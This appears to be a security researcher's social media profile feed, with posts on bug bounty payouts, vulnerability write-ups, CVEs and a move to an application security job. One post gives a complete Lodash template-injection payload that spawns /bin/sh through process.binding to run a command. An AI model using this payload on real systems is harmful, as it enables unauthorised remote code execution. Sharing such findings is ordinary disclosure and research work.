Harsh Jaiswal
@rootxharsh
Building @hacktronai | researching at @httpvoid0x2f | auditing at @cure53berlin | prev @zomato @vimeo @pdiscoveryio
Joined April 2015
Posts
  • Did a write-up of Vimeo SSRF, it was an interesting one. RT if you like it.
  • Just got $50k (2*25k) for our RCE. Waiting for approval to publish our writeup. cc @iamnoooob
  • Sat down with @iamnoooob and worked on the recent MobileIron MDM RCE by @orange_8361, and what a great find. Here's an RCE PoC using JNDI injection via a local classloading reference, triggered using Hessian deserialization as stated in the blog. github.com/iamnoooob/CVE-…
  • Finally got the approval. Here are multiple Linode access token stealing/account takeover bugs, I like the second one. Retweet if you like it. #bugbounty
  • I bought something with bounty
  • Exploited Lodash SSTI with @iamnoooob via process binding spawn_sync. Here's a tweetable RCE PoC ${x=Object}${w=a=new x}${w.type="pipe"}${w.readable=1}${w.writable=1}${a.file="/bin/sh"}${a.args=["/bin/sh","-c","id"]}${a.stdio=[w,w]}${process.binding("spawn_sync").spawn(a).output}
  • Here's our Apple RCE writeup!
    @rootxharsh and I found and exploited a 0Day RCE in Apple's Travel Portal and were rewarded with $50K. Here's the write-up for that: github.com/httpvoid/write…
  • After more than two years of hacking on @Vimeo, I'm excited to share that I'm joining them as Application Security Engineer 🤘. It's time to go on the other side!
  • FYI - this is what the triagers go through on a daily basis in mass amounts. oof.
  • We've been assigned CVE-2021-41349 for pre-auth reflected XSS in MS Exchange. Found this with @iamnoooob months back while playing with ProxyShell lol. github.com/httpvoid/CVE-R… msrc.microsoft.com/update-guide/v…
  • There's a lot of blind following in infosec. Sometimes, fame is valued more than skills.
  • $30k goal by @bhavukjain1 is completed. @tweetrpersonal9 and I just got $30k from @PayPalInfoSec at @Hacker0x01
  • Sat down with @iamnoooob and did this ExifTool (CVE-2021-22204) RCE. Nice one @wcbowling! Now let's try to fit this in a JPEG.